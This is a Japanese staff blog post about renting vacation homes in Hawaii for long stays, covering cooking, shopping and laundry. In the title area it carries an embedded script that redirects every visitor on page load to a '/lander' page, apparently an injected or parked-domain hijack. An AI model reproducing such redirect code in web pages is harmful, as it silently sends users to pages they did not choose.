スタッフブログ│<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html> ,ハワイリゾート,ブログ"> ">

トップページ > スタッフブログ

スタッフブログ スタッフブログ

2019/12/22ハワイの暮らし

カテゴリ:ハワイ情報

Aloha

レンタルバケーション担当のMichiyoです。

長期のお休みがあったら、旅行に行ってみたいと

思われる方は多いと思います。長期滞在であれば、日本と違う生活も体験できますよね。

ホテル滞在では、優雅に過ごす事はできますが異国の生活の体験は

できませんよね。そこでおすすめなのがバケーションレンタルです!

ホテルとは違い、普通の生活ができるので飽きないですよね。

お部屋には、キッチンがついているのでちょっとした料理もできます。

外食ばかりだとお金の出費が多かったり、胃もつかれてきて

和食が恋しくなったりもしますよね。

そこで、食料の調達にはスーパーマーケットやファーマーズマーケットがあります。

日本のスーパーに置いてない食材や陳列の仕方など日本との違いが

あってスーパー巡りも楽しいですよ。そして、長期滞在だと洗濯をしないとですよね。

お部屋の種類によっては洗濯機が備え付けてあったり、コンドミニアムの建物内に洗濯機の置いてある

フロアがあったりするので便利です。ただ、日本のように外で洗濯物を干すことができないので

乾燥機に入れてしまうか部屋干しになります。

是非一度は、バケーションレンタルを借りてハワイの暮らしを体験してみませんか。

楽しいと思いますよ。おすすめです!

admin-ajax.php

 

Mahalo

オリンピック 6月に突入しました♪ 渡航サポートのお問い合わせが増えてます♪ ハワイへ行く準備をしませんか? バーの営業再開をホノルル市長が承認
ハワイバケーションレンタル情報 ハワイ情報 お知らせ その他 未分類
2021年7月 2021年6月 2021年5月 2021年4月 2021年3月